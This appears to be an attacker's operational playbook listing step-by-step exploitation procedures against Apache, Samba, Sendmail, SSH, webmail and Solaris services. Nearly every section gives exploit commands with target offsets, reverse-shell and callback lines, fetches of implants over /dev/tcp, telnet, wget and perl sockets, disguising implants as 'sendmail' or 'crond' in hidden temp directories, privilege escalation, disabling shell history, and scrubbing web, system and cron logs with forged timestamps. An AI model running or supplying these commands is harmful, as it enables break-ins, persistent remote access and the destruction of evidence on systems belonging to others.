hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target
### Locally
netstat -an |grep 6000
xhost +
########### REDIRECTED:
### Redirector:
-tunnel
l 443 TARGET_IP
r 6006 127.0.0.1 6000
r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
### Locally (choose a method):
### This one will send command results back to a netcat window (not interactive)
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/bin/telnet PITCH_IP NETCAT_PORT"
### This one gives you an interactive window:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh&0 2>&0)"
# or for ksh:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh &0 2>&0")"
### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window):
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh"
############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh&0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window
### Once you have access........
### you need to first clean extraneous processes started by httpd ### run this to help clean: unset HISTFILE unset HISTSIZE unset HISTFILESIZE pwd exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&- /usr/sbin/lsof |grep ^sh uname -a; id mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp cd /tmp/.httpd-lock; pwd which uudecode uncompress #telnet PITCH_IP NETCAT_PORT /tmp/.httpd-lock/crond chmod 700 crond PATH=. crond PATH=. D=-cPITCHIP:NOPEN_PORT crond rm crond -nstun TARGET_IP -nrtun NOPEN_PORT noclient TARGET_IP ### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9) ### Logging: -lt /var/log/httpd /var/log/httpd/ssl_access_log /var/log/httpd/ssl_request_log /var/log/httpd/ssl_error_log /var/log/httpd/error_log -lt /var/log /var/log/messages /var/log/secure /var/log/maillog egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog #################################### ### ENVELOPSWALLOW #################################### # buffer overflow for Apache Web Usage: ./envelopswallow <-switches> -h host[:80] -h host[:port] Host to penetratea and TCP port of the web server to attack -t # Target id. Bruteforcing options (all required, unless -o is used!): -o char Default values for the following OSes (f)reebsd, (o)penbsd, (n)etbsd -b 0x12345678 Base address used for bruteforce Try 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd. 
-d -nnn          memcpy() delta between s1 and addr to overwrite. Try -146/obsd, -150/fbsd, -90/nbsd.
-z #             Number of times to repeat \0 in the buffer. Try 36 for openbsd/freebsd and 42 for netbsd.
-r #             Number of times to repeat retadd in the buffer. Try 6 for openbsd/freebsd and 5 for netbsd.
Optional stuff:
-w #             Maximum number of seconds to wait for shellcode reply
-c cmdz          Commands to execute when our shellcode replies aka auto0wncmdz
-W #             Seconds to wait between tries (use this when tunneling thru nopen)

-scan http TARGET_IP
-tunnel l RANDOM TARGET_IP 80 r NETCAT_PORT
./envelopswallow
# plug in the options of the matching line
# change TARGET_IP to 127.0.0.1 if using redirection

# 4.0 FreeBSD RELEASE apache-1.3.12 (distro binary), apache+mod_ssl-1.3.12+2.6.2 (distro binary),
# apache+php-1.3.12+3.0.15 (distro binary), apache+php-1.3.12+4.0b3 (distro binary),
# apache+ssl-1.3.9+1.37 (distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_IP:80

# 4.1 FreeBSD Apache 1.3.12 (distro binary)
./envelopswallow -o f -w 1000 -b 0xbfbfd000 -d -134 -r 11 -z 16 -h TARGET_IP:80
./envelopswallow -o f -w 1000 -b 0xbfbf0000 -d -134 -r 11 -z 16 -h TARGET_IP:80

# 4.1 FreeBSD Apache 1.3.14 / 1.3.17 / 1.3.19 / 1.3.20 / 1.3.22 / 1.3.23 / 1.3.24 (built from source)
./envelopswallow -o f -h TARGET_IP:80 -w 1000 -b 0x080edc29 -d -146 -z 36 -r 6

# 4.4 FreeBSD Apache 1.3.20 (binary)
./envelopswallow -b 0xbfbf0000 -z 16 -r 11 -d -134 -h TARGET_IP:80

# 4.4 FreeBSD ru-apache+mod_ssl-1.3.20+30.5+2.8.4 (distro binary)
./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80

# 4.5 FreeBSD apache+mod_ssl-1.3.22+2.8.5_4 (distro binary) and apache-1.3.22_7 (distro binary)
./envelopswallow -b 0xbfbfd000 -z 16 -r 11 -d -134 -h TARGET_IP:80

### Let it run through a number of addresses (rows of PppP...ppP's), then bail if it doesn't hit
### maybe let it run an hour or less
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode; ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail

### pitch window
-nstun TARGET_IP RAT_PORT

### upload local: rforkx.freebsd (FreeBSD 4.1 & 4.3) or sm11x.freebsd
### (sm11x ONLY for: Red Hat 7.0 (-t0), Red Hat 7.1 (-t1), FreeBSD 4.2 (-t2))

######################################
# RFORKX
######################################
### elevation for x86/FreeBSD
# Works-on :
# FreeBSD 3.1-RELEASE (GENERIC) #0: Mon Feb 15 11:08:08 GMT 1999
# FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999
# FreeBSD 3.3-RELEASE (GENERIC) #0: Thu Sep 16 23:40:35 GMT 1999
# FreeBSD 4.0-RELEASE (GENERIC) #0: Mon Mar 20 22:50:22 GMT 2000
# FreeBSD 4.1-RELEASE (GENERIC) #0: Fri Jul 28 14:30:31 GMT 2000
# FreeBSD 4.2-RELEASE (GENERIC) #0: Mon Nov 20 13:02:55 GMT 2000
### fails on some newer versions of FreeBSD

### upload executable
cp rforkx rf
packrat NETCAT_PORT rf
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode; ls -la
uncompress rf
ls -latr
chmod 700 rf
./rf
# wait 5 sec and maybe control-c
id
# start nopen as root then reconnect

######################################
# SM11X
######################################
Target platform 1: Red Hat Linux release 7.0 (Guinness)  ESMTP Sendmail 8.11.0/8.11.0
Target platform 2: Red Hat Linux release 7.1 (Seawolf)   ESMTP Sendmail 8.11.2/8.11.2
Target platform 3: FreeBSD 4.2-RELEASE                   ESMTP Sendmail 8.11.1/8.11.1
Also: Caldera Linux 3.1, Conectiva Linux 6.0, Conectiva Linux 7.0, Immunix Linux 7.0,
SuSE Linux 7.0, SuSE Linux 7.1, SuSE Linux 7.2
"sendmail" daemon with any of the versions...
8.11 8.11.1 8.11.2 8.11.3 8.11.4 8.11.5 8.12.beta5 8.12.beta7 8.12.beta10 8.12.beta12 8.12.beta16

What assumptions have been made in the design of this capability?
Setuid "root" existence of "/usr/sbin/sendmail" on Red Hat Linux 7.0 and 7.1 systems,
and "/usr/libexec/sendmail/sendmail" on FreeBSD-4.2 systems.
### LOGGING: "/var/mail/maillog"
cat /etc/redhat-release
ls -l /usr/sbin/sendmail
./sm11x -t OPTION
### look for the cksums to match; if they don't, you have 5 secs to control-c
### if you don't control-c, a second 5-sec counter will start; you'll also see the following message:
Recipient names must be specified
###### Cleanup:
/var/log/messages (brute force)
/var/log/error_log (bus error, segment. fault, server seems busy)

###################################
# EGGBARON
###################################
### Linux and FreeBSD systems running Samba 2.2.x (pre 2.2.8a) on x86 architectures.
### If successful, it has samba start a listener on port 45295 and the exploit will attempt
### to connect to it to give you root.
### If you're redirecting, you need to set up a tunnel to port 45295 on the target,
### then connect to it via netcat.
### Note that if you use the same ports on both tunnel ends, eggbaron may think that it
### was already successful because of false positives by the tunnel.
### Might need to let it give "failed" messages 20-30 times before it works.
./sambal
samba-2.2.x < remote root
--------------------------
Usage: ./sambal [-bBcCdfprsStv] [host]
-b   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B   bruteforce steps (default = 300)
-c   connectback ip address
-C   max childs for scan/bruteforce mode (default = 40)
-d   bruteforce/scanmode delay in micro seconds (default = 100000)
-f   force
-p   port to attack (default = 139)
-r   return address
-s   scan mode (random)
-S   scan mode
-t   presets (0 for a list)
-v   verbose mode

./sambal -t0
samba-2.2.x < remote root
--------------------------
01. samba-2.2.x - Debian 3.0 [0xbffffea2]
02. samba-2.2.x - Gentoo 1.4.x [0xbfffe890]
03. samba-2.2.x - Mandrake 8.x [0xbffff6a0]
04. samba-2.2.x - Mandrake 9.0 [0xbfffe638]
05. samba-2.2.x - Redhat 9.0 [0xbffff7cc]
06. samba-2.2.x - Redhat 8.0 [0xbffff2f0]
07. samba-2.2.x - Redhat 7.x [0xbffff310]
08. samba-2.2.x - Redhat 6.x [0xbffff2f0]
09. samba-2.2.x - Slackware 9.0 [0xbffff574]
10. samba-2.2.x - Slackware 8.x [0xbffff574]
11. samba-2.2.x - SuSE 7.x [0xbffffbe6]
12. samba-2.2.x - SuSE 8.x [0xbffff8f8]
13. samba-2.2.x - FreeBSD 5.0 [0xbfbff374]
14. samba-2.2.x - FreeBSD 4.x [0xbfbff374]
15. samba-2.2.x - NetBSD 1.6 [0xbfbfd5d0]
16. samba-2.2.x - NetBSD 1.5 [0xbfbfd520]
17. samba-2.2.x - OpenBSD 3.2 [0x00159198]
18. samba-2.2.8 - OpenBSD 3.2 (package) [0x001dd258]
19. samba-2.2.7 - OpenBSD 3.2 (package) [0x001d9230]
20. samba-2.2.5 - OpenBSD 3.2 (package) [0x001d6170]
21. Crash (All platforms) [0xbade5dee]

# EGGBARON may not work the first time using the target number as the -t flag.
# Try bruteforcing it using the -b flag. This usually works, and after very few tries.
# If this is taking a long time, try setting the bruteforce step size down with -B 100
# (-b picks the OS, -B is the step size).
# Subsequently, the -t flag will work
./sambal -b 0 TARGET_IP

####### redirected:
### via pitch:
-tunnel l 1139 TARGET_IP 139 l 4444 TARGET_IP 45295 r NETCAT_PORT
### Locally:
./sambal -p 1139 -b 0 127.0.0.1
./sambal -f -p 1139 -b 0 127.0.0.1
# skip to nc section

### Thru a windows box:
### 1. Need a 2 second delay (-d 2000000)
### 2. Need three tunnels (exploit, nc to port 45295, and callback to upload RAT)
background redirect -tcp -lplisten 4444 -target 10.1.1.3 45295 -bind WINDOWS_LOCAL
background redirect -tcp -lplisten 1139 -target 10.1.1.3 139 -bind WINDOWS_LOCAL
background redirect -tcp -implantlisten 25896 -target LOCAL_UNIX 25896 -nodes 40
### If you think you can't contact the target directly and want the exploit to
### call back to you, use the "-c WINDOWS_TARG_CALLBACK" option, and start
### a windows tunnel and unix netcat listener on port 45295
### Even if the "-c WINDOWS_TARG_CALLBACK" is used, both a callback to port 45295 _AND_
### a listener on the target's port 45295 will be created
### Locally:
./sambal -t0
./sambal -r 0xbffffb00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 2000000 -p 1139 WIN_LOCAL
./sambal -r 0xbffffd00 -b 0 -B 300 -v -c WINDOWS_TARG_CALLBACK -C 1 -f -d 2000000 -p 1139 WIN_LOCAL

### try connecting via netcat after any "session failed" message when redirecting:
nc PITCH_IP_or_WINDOWS_LOCAL 4444
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
uname -a
### start a netcat with the right nopen version (don't need to uuencode with the /dev/tcp way)
### nc -l -v -p NETCAT_PORT < sendmail
pwd
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
ls -l /usr/bin/uudecode /bin/cat
# bash only: /dev/tcp/... exists only as a redirection target, so the "<" matters
/bin/cat < /dev/tcp/PITCH_IP/NETCAT_PORT > /tmp/.scsi/sendmail
chmod 700 sendmail
PATH=. sendmail
id

### Cleanup
# look for stray process in netstat (bunch of funky chars followed by /bin/sh on port 45295)
# then kill the associated process running it:
netstat -anlp | grep 45295
ps -ef | grep
kill -9
# Logging depends on OS; usually indicated in smb.conf file or check:
# /var/log/samba/smb.log, /var/log/samba/.log

##################################################
# EXTRANEOUSMONKEY
##################################################
-tunnel l 443 TARGET_IP
### verify the exploit will work with a test command:
./em -i 127.0.0.1 -t 2 -u "w; date; date -u; uname -a"
### next, run this one using the proper noclient & noserver
### nopen will be started as httpd owned by apache
### you'll connect in the / directory
./em -i 127.0.0.1 -t 2 -s /current/up/noserver -c /current/bin/noclient
-cd /tmp
-lt
uname -a
### start another nopen listener on a random port (not reusing the socket)
unset I; PATH=. D=-l38475 .httpd
### from redirector
-nstun TARGET_IP:38475
### elevate using your favorite local (probably EVENTSTART), then start
### another privileged noserver, connect to it, then clean up
### Logging:
/var/log/httpd/ssl_error_log
/var/log/httpd/access_log
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log

##############################################################################
### EXPIRETRACHEA
##############################################################################
# close to freebsd 4.3
# copy nopen for freebsd 4.3 as noserver in /current/up; automatically uploads and connects
-scan mail TARGET_IP
# returns BorderWare MXtreme Mail Firewall
#cgi-bin/remote/expiretrachea/i586-pc-linux-gnu/opscript.borderware
#expiretrachea_helper.pl
#expiretrachea.pl -h hostname -c PITCH_IP
### redirected:
-tunnel l 80 TARGET_IP r 25
# 1st window
expiretrachea_helper.pl -c PITCH_IP
# 2nd window
expiretrachea.pl -h 127.0.0.1 -c PITCH_IP

# clean logs:
### /server/ftp/log/httpd: referer_log, ssl_request_log, and access_log
#grep -v "-" /server/ftp/log/httpd/referer_log > /tmp/.scsi/c; cat /tmp/.scsi/c > /server/ftp/log/httpd/referer_log
pwd
-lt /server/ftp/log
-lt /server/ftp/log/httpd
-lt /
df -k
w
ps -auxww
-cd /var/tmp
-get /server/ftp/log/messages
-tail /server/ftp/log/messages
grep -v DSADMIN /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
grep -v PITCH_IP /server/ftp/log/messages > m; cat m > /server/ftp/log/messages
-get /server/ftp/log/httpd/referer_log
-tail /server/ftp/log/httpd/referer_log
grep -v prepend /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log
grep -v x90 /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log
grep -v admin /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log
grep -v C /server/ftp/log/httpd/referer_log > m; cat m > /server/ftp/log/httpd/referer_log
-get /server/ftp/log/httpd/access_log
-tail /server/ftp/log/httpd/access_log
grep -v PITCH_IP /server/ftp/log/httpd/access_log > m; cat m > /server/ftp/log/httpd/access_log
-get /server/ftp/log/httpd/ssl_request_log
-tail /server/ftp/log/httpd/ssl_request_log
grep -v PITCH_IP /server/ftp/log/httpd/ssl_request_log > m; cat m > /server/ftp/log/httpd/ssl_request_log
-get /server/ftp/log/httpd/error_log
-tail /server/ftp/log/httpd/error_log
grep -v PITCH_IP /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/httpd/error_log
grep -v db_sql /server/ftp/log/httpd/error_log > m; cat m > /server/ftp/log/httpd/error_log
-rm m
-rm /tmp/.scsi/sendmail /tmp/.scsi/getopt /tmp/.scsi
-lt

###################################################
### NFTP
###################################################
# nopen ftp
############
ourtn -lue PITCH_IP
noclient PITCH_IP:PORT
-tunnel 12121 udp
# NOTE: As of v1.1, if this is not there, the error message will offer it as a pastable.
# In the LOCAL window, use nftp to transfer a file in both directions
# via NOPEN redirection to PITCH_IP in regular mode (-d and -V are
# optional and give more debugging/verbose information):
nftp -r PITCH_IP -d -V TARGET_IP
# pnftp -r PITCH_IP -d -V TARGET_IP
user password
ls
cd /bin
lcd ../down
#get vi
cd /tmp
#put vi vi.test1
bye

#######################################
### ELITEHAMMER
#######################################
### Runs against RedFlag Webmail 4 (software install)
### Gives you user nobody, not root;
### Need a local to get root (EVENTSTART or ELASTICBANJO?)
### Webmail port is usually 80 or 443
-scan http TARGET_IP
-scan ssl TARGET_IP
-scan 8025 TARGET_IP
### This version will reuse the same port for the nopen upload and the nopen callback:
### Redirector:
-tunnel l WEBPORT TARGET_IP r CALL_BACK_PORT
### In two scripted local windows, run the following:
### 1st window
###./elitehammer_helper.pl -c -p [-n path to noserver ] [-s sleep secs ]
./elitehammer_helper.pl -c PITCH_IP -p CALL_BACK_PORT
### 2nd window
###./elitehammer.pl -h -m -c -p [-l if https]
./elitehammer.pl -h 127.0.0.1 -m WEBPORT -c PITCH_IP -p CALL_BACK_PORT

### Troubleshooting Elitehammer
### If you throw the exploit and just see the first connection,
### a firewall might be blocking certain outbound ports
-tunnel l 8888 TARGET_IP mailport r 53 r 25 r 110 r 80 r 443 r 21 r 22 r 23
### Locally, set up nc for each of the above ports to see what the target will allow
### out (53,25,110,80,443,21,22,23)
nc -l -p NETCAT_PORT
### Then surf the following in a web browser and watch your netcat window for a connection:
http://127.0.0.1:8888/mod_password.php?cfg_m_function=http://PITCH_IP:NETCAT_PORT
### Once you've identified a port allowed out, change the CALL_BACK_PORT in your tunnels and
### commands and try again
### Once successful, you'll be connected in a nopen window as user nobody
-lt
id
-cd /tmp/.scsi
-lt
uname -a
w
### more windows
# noclient -l CALL_BACK_PORT
# PATH=. D="-cPITCH_IP:CALL_BACK_PORT" sendmail
### Choose your poison for elevation (EVENTSTART, ELASTICBANJO, others)

### Clean up /webmail4/www/logs/access_log
-lt /webmail4/www/logs
-grep PITCH_IP /webmail4/www/logs/access_log
grep -v PITCH_IP /webmail4/www/logs/access_log > m; cat m > /webmail4/www/logs/access_log
touch -t YYMMDDHHMM.ss /webmail4/www/logs/access_log
-lt /webmail4/www/logs/access_log
-rm m
-cd /tmp
-rm .scsi

#######################################
### ELASTICBANJO
#######################################
### Elevates to root; make sure redmin is there
-lt /usr/share/redmin/cgi/redmin
### must use /tmp/.scsi directory
-cd /tmp/.scsi
-put /current/up/gr.tbz2 gr.tbz2
tar xvfj gr.tbz2
-shell
id
./gr
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
pwd
cd /tmp/.scsi
#PATH=. sendmail
#noclient -l NOPEN_PORT
#PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail
exit
exit

### Clean up /var/log/rflogview/system_info /var/log/cron /var/spool/at/.SEQ /tmp/1
-lt /tmp
-rm /tmp/1
-lt /var/spool
-lt /var/spool/at
-cat /var/spool/at/.SEQ
# decrement the number in the file by 1
#echo 00000 > /var/spool/at/.SEQ
#echo NUMBER > /var/spool/at/.SEQ
chown daemon:daemon /var/spool/at/.SEQ
-cat /var/spool/at/.SEQ
-lt /var/spool/at
-touch /var/spool /var/spool/at/.SEQ
-touch /var/spool /var/spool/at/spool
-touch /var/spool /var/spool/at
-lt /var/log/cron
-grep LIST /var/log/cron
# all should be from us
-gs grepout LIST /var/log/cron
#grep -v LIST /var/log/cron > m; cat m > /var/log/cron
-lt /var/log/rflogview
-tail /var/log/rflogview/system_info
-grep LIST /var/log/rflogview/system_info
-gs grepout LIST /var/log/rflogview/system_info
# grep -v LIST /var/log/rflogview/system_info > m; cat m > /var/log/rflogview/system_info
-lt / /var/run /var/log
# check history files for root and user you elevated from
-rm m sendmail
-cd /tmp
-rm /tmp/.scsi

########## Adding/Deleting ipchains rules to scan/exploit internal targets ###
# specifically used for jogswirl (*.133u, .132u)
# on target
-ifconfig
ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-orig
ipchains -L -n --line-numbers
# locally
./fw-ipchains -h
./fw-ipchains -s 172.16.80.19 -d 172.16.0.0/16
# on target
# copy/paste add rules (tcp/udp...) from fw-ipchains output
# scan/exploit targets
ipchains -L -n --line-numbers
# copy/paste delete rules (tcp/udp...) from fw-ipchains output
ipchains -L -n --line-numbers > L:/current/down/ipchains.lnumbers-clean
ipchains -L -n --line-numbers
# locally
cd /current/down
diff ipchains.lnumbers-orig ipchains.lnumbers-clean
# make sure -orig and -clean look the same; that confirms the rules are back in their original state

####################################################
# KWIKEMART
####################################################
# SSH-1.5-1.2.27
# SSH-1.5-OpenSSH-1.2.3
# SSH-1.99-OpenSSH_2.1.1
# SSH-1.99-OpenSSH_2.2.0
telnet TARGET_IP
./km* -t
./km -t0
./km.e -t0
./km -t2 TARGET_IP 22
# CLEAN UP
/var/log/messages
/var/log/auth
####################################################

############################################################
# SSH
############################################################
### get nopen ready to paste with gedit:
cp noserver sendmail
compress sendmail
uuencode sendmail.Z sendmail.Z > sendmail.Z.uu
gedit sendmail.Z.uu
### redirector
-tunnel l 22 TARGET_IP
# Multiple targets?
# If so, wipe your known_hosts file locally between each:
cat /dev/null > ~/.ssh/known_hosts
ssh -x iga@127.0.0.1 "/bin/sh"
# or
ssh -p RANDOM_PORT -x username@127.0.0.1 /bin/sh
# or this eliminates the lack-of-tty problem
ssh -p RANDOM_PORT -x username@127.0.0.1
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
w
id
uname -a
ls -la /boot
mkdir /tmp/.scsi; cd /tmp/.scsi; pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -la
# LINUX:
# start nopen so you can upload forkpty to be able to su (ptrace didn't work)
-put forkpty f
./f
# or:
su

############## upload nopen:
###
### using uudecode pastable
###
# if no uuencode and no ftshell (if you used telnet) try:
# locally run:
uudecode.pastable /current/up/morerats/noserver-3.0.3.1-i586.pc.linux.gnu.redhat-5.0 sendmail
# paste the perl code that it spits out (hitting return after the last character), then
# paste sendmail that is brought up in gedit
# you may need to hit Ctl-C after you see the upload complete
# Note: the upload may not echo to the screen until after the Ctl-C

###
### using cat & /dev/tcp:
###
# on redir:
-tunnel r RANDOM
# netcat
nc -l -v -p RANDOM < sendmail
# on target (bash only: /dev/tcp/... exists only as a redirection target, so the "<" is required):
cat < /dev/tcp/PITCH_IP/RANDOM > sendmail

###
### using wget:
###
# If none of the above work:
# Locally: prepend a bare HTTP status line and blank line so wget accepts the raw file from netcat
echo -e 'HTTP/1.0 200\n' > new
cat new ../up/morerats/noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > /current/up/sendmail
nc -l -v -p RANDOM < sendmail
# on redir:
-tunnel r RANDOM
# on target
wget http://210.56.8.10:RANDOM/sendmail
ls -la
chmod 700 sendmail
PATH=. sendmail
-nstun TARGET_IP

###
### using secure copy
###
# if that doesn't work, try secure copy:
# on redir:
-tunnel l RANDOM TARGET_IP 22
# in a local scripted window:
cd /current/up
cp /current/up/noserver crond
scp -P RANDOM crond username@127.0.0.1:/tmp/.scsi/crond
# enter passwd at the prompt

###
### Want netcat? netcat nc -- how about perl instead?
### using target's perl to open a socket, either
### callback or listen on target.
### vi: mark, substitute the placeholders, jump back
my
:%s/PERLNAME/PERLNAME/g
:%s/PERLRANDOMPORT/PERLRANDOMPORT/g
:%s/PERLCALLBACKIP/PERLCALLBACKIP/g
:%s/PERLCALLFORWARDIP/PERLCALLFORWARDIP/g
:%s,PERLUPLOADFILE,PERLUPLOADFILE,g
`y

#### CALLING out from target
# LOCALLY use netcat to upload file
nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE
# or if you want a loop to keep listening after each upload
while [ 1 ] ; do \
  echo starting listen on PERLRANDOMPORT ; \
  date ; \
  nc -vv -l -p PERLRANDOMPORT < PERLUPLOADFILE; \
  echo done ; \
  sleep 3 ; \
done
# tunnel
-tunnel r PERLRANDOMPORT
# ON TARGET
perl -MIO -e 'close(STDIN);$c=IO::Socket::INET->new("PERLCALLBACKIP:PERLRANDOMPORT")or exit 1;binmode($c);open(O,">PERLNAME")or exit 1;binmode(O);select O;$|=1; print O while (<$c>);close(STDOUT);close($c);unlink("PERLNAME") unless (-s "PERLNAME");'

### LISTENING on target
# ON TARGET
perl -MIO -e '$s=new IO::Socket::INET(LocalPort,PERLRANDOMPORT,Reuse,1,Listen,10) or exit 1; $c=$s->accept() or exit 1;open(O,">PERLNAME")or exit 1;select O;$|=1;print O while <$c>;close(O);close($c);unlink("PERLNAME") unless (-s "PERLNAME");'
# tunnel
-tunnel l PERLRANDOMPORT PERLCALLFORWARDIP
# LOCALLY
nc -vv 127.0.0.1 PERLRANDOMPORT < PERLUPLOADFILE

###
### to elevate using EVENTSTART(?) use whatever name you want
###
-put /current/up/h h
# in your ssh or telnet masquerade window:
./h
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
cd /tmp/.scsi; pwd
chmod 700 sendmail
chown root:root /tmp/.scsi
PATH=. sendmail
### in another window
-nstun TARGET_IP 32755
-rm sendmail
##### Don't forget to burn the unprivileged nopen
# Cleanup
/var/log/secure
/var/log/messages
/var/log/lastlog
/var/log/wtmp
/var/run/utmp

###########################################################
# BOSSLAD
###########################################################
### when nsrexec is there but NOT with nsrstatd???
### like a tcp version of BS
### always uses port 7937
### ./bll.tnc.gr
# Before running this script, you first need to run the following:
# nc -l -p localPort < file2Xfer&Run.uu
# (nc must be in your path; it's also run w/in this script)
# where file2Xfer&Run.uu is a compressed, uuencoded file.
# Usage: bll.tnc.gr # [options] -- [options to ]
#   -i (required)
#   -l (required)
#   -p def = 32177
#   -f (required)
#   -D def= /tmp/.X11R6
#
# ./bll.tnc.gr -i 66.128.32.67 -l 67.233.61.230 -p 24792 -f sendmail -D /tmp/.scsi
packrat NETCAT_PORT
### On redirector:
-tunnel l 7937 TARGET_IP r NETCAT_PORT
### On local machine:
### Ex.: ./bll.tnc.gr -i 127.0.0.1 -l 150.27.1.11 -p 45226 -f sendmail -D /tmp/.scsi
./bll.tnc.gr -i 127.0.0.1 -l PITCH_IP -p NETCAT_PORT -f RAT_NAME -D /tmp/WORK_DIR
### Once upload of RAT completes, connect to target from PI with nopen:
-nstun TARGET_IP
### Cleanup
-ls /nsr/cores
-ls /nsr/cores/sh
-cat /nsr/cores/sh/*
rm /nsr/cores/sh/*
-rm /nsr/cores/sh
-touch SOMEFILE /nsr/cores
-ls /nsr/logs
-ls /nsr/logs/daemon.log
-get /nsr/logs/daemon.log
wc -l /nsr/logs/daemon.log
head -## /nsr/logs/daemon.log > n
-cat n
cat n > /nsr/logs/daemon.log
-touch SOMEFILE /nsr/logs/daemon.log

#########################################################
# ELVISCICADA
#########################################################
### only up to early Sol2.9; Sol2.10 not vulnerable
### snmpXdmid (/usr/lib/dmi/dmispd) daemon program (RPC program 300598 version 1)
# Req:
# 1. you must know the OS
# 2. you must be able to connect with TCP (for when you get the root shell)
# 3. /usr/lib/dmi/dmispd must be running on the target system,
#    and you must be able to successfully talk to its ___UDP___ port.
#    This is usually evidenced by RPC program 300598 version 1
#    during rpcinfo -p and UDP rpcinfo -n "touches" of the target, such as...
#
# $ rpcinfo -p target
# ...
#   300598    1   udp  32879
#   300598    1   tcp  32796
# ...
# $ rpcinfo -n 32879 -u target 300598
# program 300598 version 1 ready and waiting
# $
#
# if rpcinfo -n returns "ready and waiting", ELVISCICADA should be ready to sing.
###
-scan brpc TARGET_IP
### look for program 300598 version 1 of dmispd and make note of the UDP port
### test that TCP connects get thru to the default shellcode port (32387)
### (being refused is still good - means it went thru)
### If the port doesn't answer, pick another port that works, AND add the "-s" option
### using the new (random) port
# ON PI:
-tunnel l 32387 TARGET_IP
# Locally
telnet 127.0.0.1 32387
### Usage: ./dw.linux
### Use the lowest number for the target OS and increment by one for subsequent attempts:
./dw.linux -t -i TARGET_IP -s RANDOMSHELLPORT -p UDPPROGRAMPORT
./dw.linux -t -i TARGET_IP -p UDPPROGRAMPORT
### If redirected:
# On PITCHIMPAIR
-tunnel l RANDOMSHELLPORT TARGET_IP u PROGRAMPORT TARGET_IP r NETCATPORT
# Locally:
./dw.linux -t -i 127.0.0.1 -s RANDOMSHELLPORT -p UDPPROGRAMPORT -w 10 -b 1024
./dw.linux -t -i 127.0.0.1 -p UDPPROGRAMPORT
### Once you have root, get nopen up there:
### on PITCHIMPAIR
-tunnel r NETCAT_PORT
### On target:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode; ls -la
uncompress sendmail.Z
netstat -an | grep RAT_PORT
D="-l RAT_PORT" PATH=. sendmail
netstat -an | grep RAT_PORT
### pitch window
-nstun TARGET_IP RAT_PORT
### Restart both dmispd daemons before leaving the target:
ps -ef | grep dmi
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&-
rpcinfo -d 300598 1
/etc/rc3.d/S77dmi stop < /dev/console 2>&1 >/dev/null
/etc/rc3.d/S77dmi start < /dev/console 2>&1 >/dev/null
